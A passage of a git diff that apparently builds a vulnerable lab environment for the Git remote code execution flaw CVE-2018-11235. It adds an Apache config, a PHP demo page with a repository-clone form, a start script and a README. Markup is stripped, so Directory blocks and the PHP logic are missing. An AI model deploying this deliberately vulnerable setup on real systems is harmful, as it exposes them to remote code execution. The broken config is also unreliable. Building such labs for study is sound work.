not allow access to the root filesystem outside of /usr/share and /var/www. +# The former is used by web applications packaged in Debian, +# the latter may be used for local directories served by the web server. If +# your system is serving content from a sub-directory in /srv you must allow +# access here, or in any related virtual host. 
+ + Options FollowSymLinks + AllowOverride None + Require all denied + + + + AllowOverride None + Require all granted + + + + Options Indexes FollowSymLinks + AllowOverride None + Require all granted + + +# +# Options Indexes FollowSymLinks +# AllowOverride None +# Require all granted +# + + Options Indexes FollowSymLinks + + SetHandler application/x-httpd-php-source + Order Deny,Allow + Allow from all + + + + + +# AccessFileName: The name of the file to look for in each directory +# for additional configuration directives. See also the AllowOverride +# directive. +# +AccessFileName .htaccess + +# +# The following lines prevent .htaccess and .htpasswd files from being +# viewed by Web clients. +# + + Require all denied + + + +# +# The following directives define some format nicknames for use with +# a CustomLog directive. +# +# These deviate from the Common Log Format definitions in that they use %O +# (the actual bytes sent including headers) instead of %b (the size of the +# requested file), because the latter makes it impossible to detect partial +# requests. +# +# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. +# Use mod_remoteip instead. +# +LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined +LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined +LogFormat "%h %l %u %t \"%r\" %>s %O" common +LogFormat "%{Referer}i -> %U" referer +LogFormat "%{User-agent}i" agent + +# Include of directories ignores editors' and dpkg's backup files, +# see README.Debian for details. + +# Include generic snippets of statements +IncludeOptional conf-enabled/*.conf + +# Include the virtual host configurations: +IncludeOptional sites-enabled/*.conf + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet diff --git a/g/git/1/src/index.php b/g/git/1/src/index.php new file mode 100644 index 0000000..bb7720d --- /dev/null +++ b/g/git/1/src/index.php @@ -0,0 +1,23 @@ + + + + Repository Clone + + +

CVE-2018-11235 Vuln Demo

+
+
+
+ +
+

注意:GitHub 和微软(通过 Visual Studio Team Services)的 Git 托管服务已经部署了这些补丁,clone 的 URL 可以使用自己的服务器。

+Repos'; + } +?> + + diff --git a/g/git/1/src/start.sh b/g/git/1/src/start.sh new file mode 100644 index 0000000..3f737e7 --- /dev/null +++ b/g/git/1/src/start.sh @@ -0,0 +1,3 @@ +#!/bin/bash +/etc/init.d/apache2 restart +/usr/bin/tail -f /dev/null diff --git a/g/git/README.md b/g/git/README.md new file mode 100644 index 0000000..27f9981 --- /dev/null +++ b/g/git/README.md @@ -0,0 +1,4 @@ +Git +--- + +1. [Git远程代码执行漏洞(CVE-2018-11235)](./1/)